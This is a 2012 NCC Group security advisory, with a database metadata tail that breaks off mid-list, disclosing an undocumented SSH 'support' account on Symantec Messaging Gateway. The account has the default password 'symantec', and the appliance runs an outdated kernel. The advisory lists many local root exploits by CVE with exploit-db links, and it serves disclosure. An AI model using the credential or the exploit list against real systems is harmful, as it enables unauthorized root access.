NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel

2012-12-02T00:00:00

Description

======= Summary ======= Name: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel Release Date: 30 November 2012 Reference: NGS00267 Discoverer: Ben Williams <ben.williams@ngssecure.com> Vendor: Symantec Vendor Reference: Systems Affected: Symantec Messaging Gateway 9.5.3-3 Risk: High Status: Published ======== TimeLine ======== Discovered: 18 April 2012 Released: 18 April 2012 Approved: 29 April 2012 Reported: 30 April 2012 Fixed: 27 August 2012 Published: 30 November 2012 =========== Description =========== I. VULNERABILITY ------------------------- Symantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel II. BACKGROUND ------------------------- Symantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance III. DESCRIPTION ------------------------- The "admin" SSH account has a restricted shell, and the password is set by the administrator during setup. However, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists. Additionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login and escalate to root. ================= Technical Details ================= IV. PROOF OF CONCEPT ------------------------- Both the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. It is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment. Additionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues. [+] Results for kernel version 2.6.18-274.3.1.2.el5_sms Potential exploits: * Linux Kernel BCM Local Root Exploit CVE: CVE-2010-2959 Affects kernels: 2.6.0-2.6.36rc1 Exploits: http://www.exploit-db.com/exploits/14814 * Linux Kernel RDS protocol Local Root Exploit CVE: CVE-2010-3904 Affects kernels: 2.6.0-2.6.36rc8 Exploits: http://www.exploit-db.com/exploits/15285 * Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit CVE: CVE-2010-3848 Affects kernels: 2.6.0-2.6.36.2 Exploits: http://www.exploit-db.com/exploits/17787 * Linux Kernel Unknown Local Root Exploit CVE: CVE-None Affects kernels: 2.6.18-2.6.20 Exploits: http://www.exploit-db.com/exploits/10613 * Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit CVE: CVE-2009-2692 Affects kernels: 2.6.0-2.6.31rc3 Exploits: http://www.exploit-db.com/exploits/9641 http://www.exploit-db.com/exploits/9545 http://www.exploit-db.com/exploits/9479 http://www.exploit-db.com/exploits/9436 http://www.exploit-db.com/exploits/9435 http://www.grsecurity.net/~spender/enlightenment.tgz * Linux Kernel pipe.c (MooseCox) Local Root Exploit CVE: CVE-2009-3547 Affects kernels: 2.6.0-2.6.32rc5 Exploits: http://www.exploit-db.com/exploits/10018 http://www.grsecurity.net/~spender/enlightenment.tgz * Linux Kernel ReiserFS xattr Local Root Exploit CVE: CVE-2010-1146 Affects kernels: 2.6.0-2.6.34rc3 Exploits: http://www.exploit-db.com/exploits/12130 * Linux Kernel vmsplice Local Root Exploit CVE: CVE-2008-0009 Affects kernels: 2.6.17-2.6.24.1 Exploits: http://www.exploit-db.com/exploits/5092 http://www.exploit-db.com/exploits/5093 * Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit CVE: CVE-2010-3850 Affects kernels: 2.6.0-2.6.36.2 Exploits: http://www.exploit-db.com/exploits/17787 http://www.exploit-db.com/exploits/15704 * Linux Kernel ACPI custom_method Local Root Exploit CVE: CVE-2010-4347 Affects kernels: 2.6.0-2.6.37rc2 Exploits: http://www.exploit-db.com/exploits/15774 * Linux Kernel ftruncate()/open() Local Root Exploit CVE: CVE-2008-4210 Affects kernels: 2.6.0-2.6.22 Exploits: http://www.exploit-db.com/exploits/6851 * Linux Kernel put_user() - full-nelson Local Root Exploit CVE: CVE-2010-4258 Affects kernels: 2.6.0-2.6.37 Exploits: http://www.exploit-db.com/exploits/15704 * Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit CVE: CVE-2010-3849 Affects kernels: 2.6.0-2.6.37 Exploits: http://www.exploit-db.com/exploits/15704 * Linux Kernel ipc - half-nelson Local Root Exploit CVE: CVE-2010-4073 Affects kernels: 2.6.0-2.6.37rc1 Exploits: http://www.exploit-db.com/exploits/17787 * Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit CVE: CVE-None Affects kernels: 2.6.9-2.6.30 Exploits: http://www.exploit-db.com/exploits/9208 http://www.exploit-db.com/exploits/9191 http://www.grsecurity.net/~spender/enlightenment.tgz * Linux Kernel exit_notify() Local Root Exploit CVE: CVE-2009-1337 Affects kernels: 2.6.0-2.6.29 Exploits: http://www.exploit-db.com/exploits/8369 * Linux Kernel system call emulation Local Root Exploit CVE: CVE-2007-4573 Affects kernels: 2.6.0-2.6.22.7 Exploits: http://www.exploit-db.com/exploits/4460 * Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit CVE: CVE-2009-1046 Affects kernels: 2.6.0-2.6.28.3 Exploits: http://www.exploit-db.com/exploits/9083 =============== Fix Information =============== An updated version of the software has been released to address the vulnerability: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00 NCC Group Research http://www.nccgroup.com/research For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast. </a>

{"id": "SECURITYVULNS:DOC:28783", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\nRelease Date: 30 November 2012\r\nReference: NGS00267\r\nDiscoverer: Ben Williams <ben.williams@ngssecure.com>\r\nVendor: Symantec\r\nVendor Reference: \r\nSystems Affected: Symantec Messaging Gateway 9.5.3-3\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 18 April 2012\r\nReleased: 18 April 2012\r\nApproved: 29 April 2012\r\nReported: 30 April 2012\r\nFixed: 27 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nI. VULNERABILITY\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.\r\n\r\nHowever, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.\r\n\r\nAdditionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login and escalate to root.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nBoth the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. \r\n\r\nIt is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment.\r\n\r\nAdditionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues.\r\n\r\n[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms\r\n\r\nPotential exploits:\r\n\r\n* Linux Kernel BCM Local Root Exploit\r\n CVE: CVE-2010-2959\r\n Affects kernels: 2.6.0-2.6.36rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/14814\r\n\r\n* Linux Kernel RDS protocol Local Root Exploit\r\n CVE: CVE-2010-3904\r\n Affects kernels: 2.6.0-2.6.36rc8\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15285\r\n\r\n* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3848 \r\n Affects kernels: 2.6.0-2.6.36.2 \r\n Exploits: \r\n http://www.exploit-db.com/exploits/17787 \r\n \r\n* Linux Kernel Unknown Local Root Exploit \r\n CVE: CVE-None \r\n Affects kernels: 2.6.18-2.6.20\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10613\r\n\r\n* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit\r\n CVE: CVE-2009-2692\r\n Affects kernels: 2.6.0-2.6.31rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9641\r\n http://www.exploit-db.com/exploits/9545\r\n http://www.exploit-db.com/exploits/9479\r\n http://www.exploit-db.com/exploits/9436\r\n http://www.exploit-db.com/exploits/9435\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel pipe.c (MooseCox) Local Root Exploit\r\n CVE: CVE-2009-3547\r\n Affects kernels: 2.6.0-2.6.32rc5\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10018\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel ReiserFS xattr Local Root Exploit\r\n CVE: CVE-2010-1146\r\n Affects kernels: 2.6.0-2.6.34rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/12130\r\n\r\n* Linux Kernel vmsplice Local Root Exploit\r\n CVE: CVE-2008-0009\r\n Affects kernels: 2.6.17-2.6.24.1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/5092\r\n http://www.exploit-db.com/exploits/5093\r\n\r\n* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3850\r\n Affects kernels: 2.6.0-2.6.36.2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ACPI custom_method Local Root Exploit\r\n CVE: CVE-2010-4347\r\n Affects kernels: 2.6.0-2.6.37rc2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15774\r\n\r\n* Linux Kernel ftruncate()/open() Local Root Exploit\r\n CVE: CVE-2008-4210\r\n Affects kernels: 2.6.0-2.6.22\r\n Exploits:\r\n http://www.exploit-db.com/exploits/6851\r\n\r\n* Linux Kernel put_user() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-4258\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-3849\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ipc - half-nelson Local Root Exploit\r\n CVE: CVE-2010-4073\r\n Affects kernels: 2.6.0-2.6.37rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n\r\n* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit\r\n CVE: CVE-None\r\n Affects kernels: 2.6.9-2.6.30\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9208\r\n http://www.exploit-db.com/exploits/9191\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel exit_notify() Local Root Exploit\r\n CVE: CVE-2009-1337\r\n Affects kernels: 2.6.0-2.6.29\r\n Exploits:\r\n http://www.exploit-db.com/exploits/8369\r\n\r\n* Linux Kernel system call emulation Local Root Exploit\r\n CVE: CVE-2007-4573\r\n Affects kernels: 2.6.0-2.6.22.7\r\n Exploits:\r\n http://www.exploit-db.com/exploits/4460\r\n\r\n* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit\r\n CVE: CVE-2009-1046\r\n Affects kernels: 2.6.0-2.6.28.3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9083\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nAn updated version of the software has been released to address the vulnerability:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "published": "2012-12-02T00:00:00", "modified": "2012-12-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28783", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2010-3904", "CVE-2007-4573", "CVE-2010-4073", "CVE-2009-2692", "CVE-2009-1046", "CVE-2010-2959", "CVE-2008-0009", "CVE-2010-1146", "CVE-2010-3850", "CVE-2010-4258", "CVE-2009-3547", "CVE-2010-3848", "CVE-2009-1337", "CVE-2010-4347", "CVE-2008-4210", "CVE-2010-3849"], "immutableFields": [], "lastseen": "2018-08-31T11:10:46", "viewCount": 38, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "android", "idList": ["ANDROID:SOCK_SENDPAGE"]}, {"type": "canvas", "idList": ["FS_PIPE_RACE_TO_NULL", "LINUX_RDS", "PROTO_OPS_NULL"]}, {"type": "centos", "idList": ["CESA-2007:0936", "CESA-2007:0937", "CESA-2007:0938", "CESA-2008:0957", "CESA-2008:0972", "CESA-2008:0973", "CESA-2009:0001-01", "CESA-2009:0473", "CESA-2009:1222", "CESA-2009:1223", "CESA-2009:1233", "CESA-2009:1541", "CESA-2009:1548", "CESA-2009:1550", "CESA-2010:0792", "CESA-2011:0162"]}, {"type": "cert", "idList": ["VU:362983"]}, {"type": "checkpoint_security", "idList": ["CPS:SK42600"]}, {"type": "cve", "idList": ["CVE-2007-4573", "CVE-2008-0009", "CVE-2008-0600", "CVE-2008-3833", "CVE-2008-4210", "CVE-2009-1046", "CVE-2009-1337", "CVE-2009-2692", "CVE-2009-2962", "CVE-2009-3547", "CVE-2010-1146", "CVE-2010-2959", "CVE-2010-3301", "CVE-2010-3848", "CVE-2010-3849", "CVE-2010-3850", "CVE-2010-3904", "CVE-2010-4073", "CVE-2010-4258", "CVE-2010-4347", "CVE-2011-1021"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1378-1:921A6", "DEBIAN:DSA-1378-2:53C39", "DEBIAN:DSA-1381-1:B1830", "DEBIAN:DSA-1381-2:956ED", "DEBIAN:DSA-1504-1:18A93", "DEBIAN:DSA-1653-1:79C02", "DEBIAN:DSA-1787-1:1654D", "DEBIAN:DSA-1794-1:CF19C", "DEBIAN:DSA-1800-1:C8938", "DEBIAN:DSA-1862-1:C1869", "DEBIAN:DSA-1864-1:B2834", "DEBIAN:DSA-1865-1:34CE7", "DEBIAN:DSA-1927-1:8E712", "DEBIAN:DSA-1928-1:AD816", "DEBIAN:DSA-1929-1:8AEEF", "DEBIAN:DSA-2094-1:7CFE2", "DEBIAN:DSA-2126-1:370B4", "DEBIAN:DSA-2153-1:FDD6A"]}, {"type": "exploitdb", "idList": ["EDB-ID:14814", "EDB-ID:15285", "EDB-ID:15704", "EDB-ID:15774", "EDB-ID:17787", "EDB-ID:40812", "EDB-ID:44677", "EDB-ID:9083", "EDB-ID:9477", "EDB-ID:9479"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:06473E7FD71F4692F26EB2761FD044F3", "EXPLOITPACK:331055013C284D20013F7156B81DB5B6", "EXPLOITPACK:37FE27A2B26DE14D6D6402EB9BCD0EA0", "EXPLOITPACK:587E07B26CFC9328AECA2A6FF11BCAF8", "EXPLOITPACK:7198CA63BDD8344EDEAC346D002AFAFD", "EXPLOITPACK:80919A880D8F23D053A90FDF86EB8DAA", "EXPLOITPACK:EC59CF0D0A8C58A6BA88DD9DDE82A311", "EXPLOITPACK:F46DE1A7490F12E98496831D3CD2C519", "EXPLOITPACK:FF3D313D03F8BCB90EE2F22064032248"]}, {"type": "f5", "idList": ["F5:K10772", "F5:K16489", "F5:K8171", "SOL10772", "SOL16341", "SOL16489", "SOL8171"]}, {"type": "fedora", "idList": ["FEDORA:0BE9E110D31", "FEDORA:0DA9510F842", "FEDORA:101AF111631", "FEDORA:13309110B4E", "FEDORA:1EC1210F9FC", "FEDORA:1F915226FCF", "FEDORA:2478710F7EA", "FEDORA:2A7BE111947", "FEDORA:2BC4510F896", "FEDORA:2CF2010F7EA", "FEDORA:329D9110666", "FEDORA:3A49610F8D7", "FEDORA:3AD78110EC4", "FEDORA:41D6810F891", "FEDORA:43A4210F8C3", "FEDORA:52EFE10F85C", "FEDORA:58608110C02", "FEDORA:5AA2F10FA12", "FEDORA:5B2C610F862", "FEDORA:6F955210EC", "FEDORA:7AE2C1106A7", "FEDORA:7B88D10F857", "FEDORA:8785411086D", "FEDORA:921C610F878", "FEDORA:A272A110C4A", "FEDORA:ACEFF2102F", "FEDORA:B0F721107BF", "FEDORA:B3FC210F880", "FEDORA:B72D7110F0C", "FEDORA:BCC0720E13", "FEDORA:BD6A910FBAE", "FEDORA:C07E810F9BD", "FEDORA:C5ABB10F8BB", "FEDORA:C80E110F85F", "FEDORA:CAA68215A9", "FEDORA:E07AD11061A", "FEDORA:F394810F8A0", "FEDORA:L8PFIPEW010706", "FEDORA:M1BMCVXB005231", "FEDORA:M1BMCVXZ005231"]}, {"type": "kitploit", "idList": ["KITPLOIT:5310354020898253604"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-RDS_PRIV_ESC-", "MSF:EXPLOIT-LINUX-LOCAL-RDS_RDS_PAGE_COPY_USER_PRIV_ESC-"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2007-0936.NASL", "CENTOS_RHSA-2007-0937.NASL", "CENTOS_RHSA-2007-0938.NASL", "CENTOS_RHSA-2008-0957.NASL", "CENTOS_RHSA-2008-0972.NASL", "CENTOS_RHSA-2008-0973.NASL", "CENTOS_RHSA-2009-0473.NASL", "CENTOS_RHSA-2009-1222.NASL", "CENTOS_RHSA-2009-1223.NASL", "CENTOS_RHSA-2009-1233.NASL", "CENTOS_RHSA-2009-1541.NASL", "CENTOS_RHSA-2009-1548.NASL", "CENTOS_RHSA-2009-1550.NASL", "CENTOS_RHSA-2010-0792.NASL", "CENTOS_RHSA-2011-0162.NASL", "DEBIAN_DSA-1378.NASL", "DEBIAN_DSA-1381.NASL", "DEBIAN_DSA-1504.NASL", "DEBIAN_DSA-1653.NASL", "DEBIAN_DSA-1787.NASL", "DEBIAN_DSA-1794.NASL", "DEBIAN_DSA-1800.NASL", "DEBIAN_DSA-1862.NASL", "DEBIAN_DSA-1864.NASL", "DEBIAN_DSA-1865.NASL", "DEBIAN_DSA-1927.NASL", "DEBIAN_DSA-1928.NASL", "DEBIAN_DSA-1929.NASL", "DEBIAN_DSA-2094.NASL", "DEBIAN_DSA-2126.NASL", "DEBIAN_DSA-2153.NASL", "FEDORA_2007-2298.NASL", "FEDORA_2007-712.NASL", "FEDORA_2008-1422.NASL", "FEDORA_2008-1423.NASL", "FEDORA_2009-11032.NASL", "FEDORA_2009-11038.NASL", "FEDORA_2009-5356.NASL", "FEDORA_2009-8647.NASL", "FEDORA_2009-8649.NASL", "FEDORA_2010-13903.NASL", "FEDORA_2010-16826.NASL", "FEDORA_2010-18432.NASL", "FEDORA_2010-18493.NASL", "FEDORA_2010-18506.NASL", "FEDORA_2010-18983.NASL", "FEDORA_2010-7779.NASL", "MANDRAKE_MDKSA-2007-195.NASL", "MANDRIVA_MDVSA-2008-043.NASL", "MANDRIVA_MDVSA-2008-105.NASL", "MANDRIVA_MDVSA-2009-119.NASL", "MANDRIVA_MDVSA-2009-135.NASL", "MANDRIVA_MDVSA-2009-205.NASL", "MANDRIVA_MDVSA-2009-233.NASL", "MANDRIVA_MDVSA-2009-329.NASL", "MANDRIVA_MDVSA-2010-188.NASL", "MANDRIVA_MDVSA-2010-198.NASL", "MANDRIVA_MDVSA-2010-247.NASL", "MANDRIVA_MDVSA-2010-257.NASL", "ORACLELINUX_ELSA-2007-0936.NASL", "ORACLELINUX_ELSA-2007-0937.NASL", "ORACLELINUX_ELSA-2007-0938.NASL", "ORACLELINUX_ELSA-2008-0957.NASL", "ORACLELINUX_ELSA-2008-0972.NASL", "ORACLELINUX_ELSA-2008-0973.NASL", "ORACLELINUX_ELSA-2009-0473.NASL", "ORACLELINUX_ELSA-2009-1222.NASL", "ORACLELINUX_ELSA-2009-1223.NASL", "ORACLELINUX_ELSA-2009-1233.NASL", "ORACLELINUX_ELSA-2009-1541.NASL", "ORACLELINUX_ELSA-2009-1548.NASL", "ORACLELINUX_ELSA-2009-1550.NASL", "ORACLELINUX_ELSA-2010-0792.NASL", "ORACLELINUX_ELSA-2010-2009.NASL", "ORACLELINUX_ELSA-2011-0007.NASL", "ORACLELINUX_ELSA-2011-0162.NASL", "ORACLEVM_OVMSA-2009-0009.NASL", "ORACLEVM_OVMSA-2009-0023.NASL", "ORACLEVM_OVMSA-2009-0033.NASL", "ORACLEVM_OVMSA-2013-0039.NASL", "REDHAT-RHSA-2007-0936.NASL", "REDHAT-RHSA-2007-0937.NASL", "REDHAT-RHSA-2007-0938.NASL", "REDHAT-RHSA-2008-0957.NASL", "REDHAT-RHSA-2008-0972.NASL", "REDHAT-RHSA-2008-0973.NASL", "REDHAT-RHSA-2009-0001.NASL", "REDHAT-RHSA-2009-0473.NASL", "REDHAT-RHSA-2009-1024.NASL", "REDHAT-RHSA-2009-1077.NASL", "REDHAT-RHSA-2009-1222.NASL", "REDHAT-RHSA-2009-1223.NASL", "REDHAT-RHSA-2009-1233.NASL", "REDHAT-RHSA-2009-1457.NASL", "REDHAT-RHSA-2009-1469.NASL", "REDHAT-RHSA-2009-1541.NASL", "REDHAT-RHSA-2009-1548.NASL", "REDHAT-RHSA-2009-1550.NASL", "REDHAT-RHSA-2009-1587.NASL", "REDHAT-RHSA-2009-1588.NASL", "REDHAT-RHSA-2009-1672.NASL", "REDHAT-RHSA-2010-0792.NASL", "REDHAT-RHSA-2010-0842.NASL", "REDHAT-RHSA-2011-0007.NASL", "REDHAT-RHSA-2011-0017.NASL", "REDHAT-RHSA-2011-0162.NASL", "SLACKWARE_SSA_2009-230-01.NASL", "SL_20070927_KERNEL_ON_SL5_X.NASL", "SL_20081104_KERNEL_ON_SL5_X.NASL", "SL_20081119_KERNEL_ON_SL4_X.NASL", "SL_20081216_KERNEL_ON_SL3_X.NASL", "SL_20090507_KERNEL_ON_SL5_X.NASL", "SL_20090630_KERNEL_ON_SL4_X.NASL", "SL_20090824_KERNEL_ON_SL5_X.NASL", "SL_20090827_KERNEL_ON_SL3_X.NASL", "SL_20091103_KERNEL_ON_SL3_X.NASL", "SL_20091103_KERNEL_ON_SL4_X.NASL", "SL_20091103_KERNEL_ON_SL5_X.NASL", "SL_20101025_KERNEL_ON_SL5_X.NASL", "SL_20101110_KERNEL_ON_SL6_X.NASL", "SL_20110118_KERNEL_ON_SL4_X.NASL", "SUSE9_12541.NASL", "SUSE9_12672.NASL", "SUSE9_12677.NASL", "SUSE_11_0_KERNEL-090602.NASL", "SUSE_11_0_KERNEL-090814.NASL", "SUSE_11_0_KERNEL-100203.NASL", "SUSE_11_1_KERNEL-090527.NASL", "SUSE_11_1_KERNEL-090816.NASL", "SUSE_11_1_KERNEL-091123.NASL", "SUSE_11_1_KERNEL-100921.NASL", "SUSE_11_1_KERNEL-101202.NASL", "SUSE_11_2_KERNEL-091218.NASL", "SUSE_11_2_KERNEL-100921.NASL", "SUSE_11_2_KERNEL-101026.NASL", "SUSE_11_2_KERNEL-110413.NASL", "SUSE_11_2_KERNEL-DEBUG-101215.NASL", "SUSE_11_3_KERNEL-100915.NASL", "SUSE_11_3_KERNEL-101026.NASL", "SUSE_11_3_KERNEL-101215.NASL", "SUSE_11_3_KERNEL-110414.NASL", "SUSE_11_KERNEL-090527.NASL", "SUSE_11_KERNEL-090816.NASL", "SUSE_11_KERNEL-091123.NASL", "SUSE_11_KERNEL-100903.NASL", "SUSE_11_KERNEL-100920.NASL", "SUSE_11_KERNEL-100921.NASL", "SUSE_11_KERNEL-101102.NASL", "SUSE_11_KERNEL-110104.NASL", "SUSE_11_KERNEL-EC2-101103.NASL", "SUSE_KERNEL-4471.NASL", "SUSE_KERNEL-4472.NASL", "SUSE_KERNEL-4473.NASL", "SUSE_KERNEL-4487.NASL", "SUSE_KERNEL-4503.NASL", "SUSE_KERNEL-4741.NASL", "SUSE_KERNEL-4745.NASL", "SUSE_KERNEL-4752.NASL", "SUSE_KERNEL-5667.NASL", "SUSE_KERNEL-5668.NASL", "SUSE_KERNEL-5734.NASL", "SUSE_KERNEL-5735.NASL", "SUSE_KERNEL-5751.NASL", "SUSE_KERNEL-6109.NASL", "SUSE_KERNEL-6113.NASL", "SUSE_KERNEL-6236.NASL", "SUSE_KERNEL-6237.NASL", "SUSE_KERNEL-6274.NASL", "SUSE_KERNEL-6437.NASL", "SUSE_KERNEL-6439.NASL", "SUSE_KERNEL-6440.NASL", "SUSE_KERNEL-6632.NASL", "SUSE_KERNEL-6636.NASL", "SUSE_KERNEL-7257.NASL", "SUSE_KERNEL-7261.NASL", "SUSE_KERNEL-7303.NASL", "SUSE_KERNEL-7304.NASL", "UBUNTU_USN-1000-1.NASL", "UBUNTU_USN-1023-1.NASL", "UBUNTU_USN-1054-1.NASL", "UBUNTU_USN-1073-1.NASL", "UBUNTU_USN-1083-1.NASL", "UBUNTU_USN-1093-1.NASL", "UBUNTU_USN-1105-1.NASL", "UBUNTU_USN-1111-1.NASL", "UBUNTU_USN-1119-1.NASL", "UBUNTU_USN-1164-1.NASL", "UBUNTU_USN-1167-1.NASL", "UBUNTU_USN-1186-1.NASL", "UBUNTU_USN-1202-1.NASL", "UBUNTU_USN-518-1.NASL", "UBUNTU_USN-679-1.NASL", "UBUNTU_USN-751-1.NASL", "UBUNTU_USN-793-1.NASL", "UBUNTU_USN-819-1.NASL", "UBUNTU_USN-864-1.NASL", "UBUNTU_USN-947-1.NASL", "UBUNTU_USN-947-2.NASL", "UBUNTU_USN-974-1.NASL", "UBUNTU_USN-974-2.NASL", "VMWARE_VMSA-2009-0014.NASL", "VMWARE_VMSA-2009-0014_REMOTE.NASL", "VMWARE_VMSA-2009-0016.NASL", "VMWARE_VMSA-2009-0016_REMOTE.NASL", "VMWARE_VMSA-2010-0004.NASL", "VMWARE_VMSA-2010-0004_REMOTE.NASL", "VMWARE_VMSA-2010-0009.NASL", "VMWARE_VMSA-2010-0009_REMOTE.NASL", "VMWARE_VMSA-2010-0010.NASL", "VMWARE_VMSA-2011-0012.NASL", "VMWARE_VMSA-2011-0012_REMOTE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:103455", "OPENVAS:103468", "OPENVAS:1361412562310103455", "OPENVAS:1361412562310103468", "OPENVAS:1361412562310122244", "OPENVAS:1361412562310122281", "OPENVAS:1361412562310122303", "OPENVAS:1361412562310122305", "OPENVAS:1361412562310122306", "OPENVAS:1361412562310122422", "OPENVAS:1361412562310122454", "OPENVAS:1361412562310122489", "OPENVAS:1361412562310122545", "OPENVAS:1361412562310122658", "OPENVAS:136141256231063097", "OPENVAS:136141256231063132", "OPENVAS:136141256231063344", "OPENVAS:136141256231063908", "OPENVAS:136141256231063939", "OPENVAS:136141256231063947", "OPENVAS:136141256231063959", "OPENVAS:136141256231063970", "OPENVAS:136141256231063978", "OPENVAS:136141256231064034", "OPENVAS:136141256231064067", "OPENVAS:136141256231064074", "OPENVAS:136141256231064131", "OPENVAS:136141256231064187", "OPENVAS:136141256231064188", "OPENVAS:136141256231064189", "OPENVAS:136141256231064220", "OPENVAS:136141256231064668", "OPENVAS:136141256231064669", "OPENVAS:136141256231064671", "OPENVAS:136141256231064677", "OPENVAS:136141256231064703", "OPENVAS:136141256231064704", "OPENVAS:136141256231064707", "OPENVAS:136141256231064736", "OPENVAS:136141256231064745", "OPENVAS:136141256231064747", "OPENVAS:136141256231064748", "OPENVAS:136141256231064761", "OPENVAS:136141256231064771", "OPENVAS:136141256231064791", "OPENVAS:136141256231064792", "OPENVAS:136141256231064794", "OPENVAS:136141256231064795", "OPENVAS:136141256231064906", "OPENVAS:136141256231064923", "OPENVAS:136141256231064943", "OPENVAS:136141256231064999", "OPENVAS:136141256231065059", "OPENVAS:136141256231065259", "OPENVAS:136141256231065354", "OPENVAS:136141256231065365", "OPENVAS:136141256231065670", "OPENVAS:136141256231065709", "OPENVAS:136141256231065812", "OPENVAS:136141256231065814", "OPENVAS:136141256231065914", "OPENVAS:136141256231065924", "OPENVAS:136141256231066048", "OPENVAS:136141256231066174", "OPENVAS:136141256231066175", "OPENVAS:136141256231066176", "OPENVAS:136141256231066178", "OPENVAS:136141256231066200", "OPENVAS:136141256231066202", "OPENVAS:136141256231066207", "OPENVAS:136141256231066208", "OPENVAS:136141256231066209", "OPENVAS:136141256231066217", "OPENVAS:136141256231066218", 